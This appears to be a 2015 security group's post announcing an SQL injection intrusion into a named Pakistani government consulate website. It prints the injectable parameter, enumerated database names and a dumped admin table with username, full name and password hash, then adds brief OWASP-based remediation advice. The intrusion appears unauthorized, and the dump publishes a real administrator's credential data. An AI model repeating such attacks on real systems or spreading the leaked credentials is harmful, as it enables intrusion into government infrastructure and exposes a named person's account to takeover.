Hacked Website : http://www.pakconsulatejeddah.gov.pk/

Vuln : SQL Injection

Level : 6/10

Authorities Notified : Yes (NATIONAL RESPONSE CENTRE FOR CYBER CRIME)
Date : 27 Nov 2015
Method : Email Advisory
Proof Of Code / Hackers Information (Provided Below) :

Operation planned by: Mr.Instinct
Main Contributors: Xtam4, Axid Burn and Balalaika.

Main Target: http://www.pakconsulatejeddah.gov.pk/index.php

[*] starting at 15:13:28

[15:30:01] [INFO] GET parameter ‘item_id’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘item_id’ is vulnerable.

back-end DBMS: MySQL 5.0.11
[15:32:31] [INFO] fetching database names
[15:32:47] [INFO] the SQL query used returns 3 entries
[15:32:49] [INFO] retrieved: “information_schema”
[15:32:50] [INFO] retrieved: “pakcons_consulate”
[15:32:58] [INFO] retrieved: “pakcons_tns”
available databases [3]:
[*] information_schema
[*] pakcons_consulate
[*] pakcons_tns
Database: pakcons_consulate
Table: admin
[1 entry]
+—-+———————-+————-+———————————-+————–+
| id | email | username | password | full_name |
+—-+———————-+————-+———————————-+————–+
| 1 | [email protected] | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan |
+—-+———————-+————-+———————————-+————–+

Advisory :

Please escape user input parameter ‘item_id’.

Primary Defenses:

Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input
Additional Defenses:

Also Enforce: Least Privilege
Also Perform: White List Input Validation

For more info please visit : https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

For any more Advisory and information please feel free to contact us on [email protected].

………………….

—
Tier3 Cyber Security Solutions
Islamabad
Pakistan
www.tier3.xyz
#opsec Pakistan

#pakistan #hack #website #tier3 #alert